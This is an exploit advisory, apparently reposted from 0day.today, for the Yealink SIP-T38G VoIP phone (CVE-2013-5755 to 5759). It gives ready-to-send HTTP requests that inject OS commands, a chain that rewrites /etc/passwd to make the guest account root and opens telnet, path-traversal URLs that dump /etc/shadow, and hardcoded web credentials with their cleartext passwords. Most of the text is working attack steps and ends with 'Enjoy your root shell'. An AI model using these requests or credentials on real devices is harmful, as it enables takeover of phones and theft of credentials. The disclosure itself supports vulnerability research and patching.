Yealink VoIP Phone SIP-T38G - Multiple Vulnerabilities

Title: Yealink VoIP Phone SIP-T38G Privileges Escalation
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5759
 
Description:
 
Using the fact that cgiServer.exx run under the root privileges we use the
command execution (CVE-2013-5758) to modify the system file restriction.
Then we add extra privileges to the guest account.
 
POC:
 
Step 1 - Changing /etc folder right to 777:
 
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
system("/bin/busybox%20chmod%20-R%20777%20/etc")
 
Step 2 - Change guest user uid:
 
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
system("echo "root:x:0:0:Root,,,:/:/bin/sh
admin:x:500:500:Admin,,,:/:/bin/sh
guest:x:0:0:Guest,,,:/:/bin/sh\" > /etc/passwd
")
 
Step 3 - Connect back using telnet and guest account (password is guest):
 
# id
uid=0(root) gid=0(root)
 
Enjoy your root shell :)
 


Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758
 
Description:
 
Using cgiServer.exx we are able to send OS command using the system
function.
 
POC:
 
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
system("/bin/busybox%20telnetd%20start")

Title: Yealink VoIP Phone SIP-T38G Local File Inclusion
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5756, CVE-2013-5757
 
Description:
 
Web interface contain a vulnerability that allow any page to be included.
We are able to disclose /etc/passwd & /etc/shadow
 
POC:
Using the page parameter (CVE-2013-5756):
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://
[host]/cgi-bin/cgiServer.exx?page=..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow
 
Using the command parameter (CVE-2013-5757):
http://[host]/cgi-bin/cgiServer.exx?command=dumpConfigFile("/etc/shadow")
 
*By viewing the shadow file we are able to conclude that cgiServer.exx run
under the root privileges. This lead to CVE-2013-5759.

Title: Yealink VoIP Phone SIP-T38G Default Credentials
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5755
 
Description:
 
Web interface use hardcoded default credential in /config/.htpasswd
 
 
user:s7C9Cx.rLsWFA admin:uoCbM.VEiKQto var:jhl3iZAe./qXM
 
Here's the cleartext password for these accounts:
 
user:user
admin:admin
var:var

-- 
*Mr.Un1k0d3r** or 1 #*

#  0day.today [2018-03-13]  #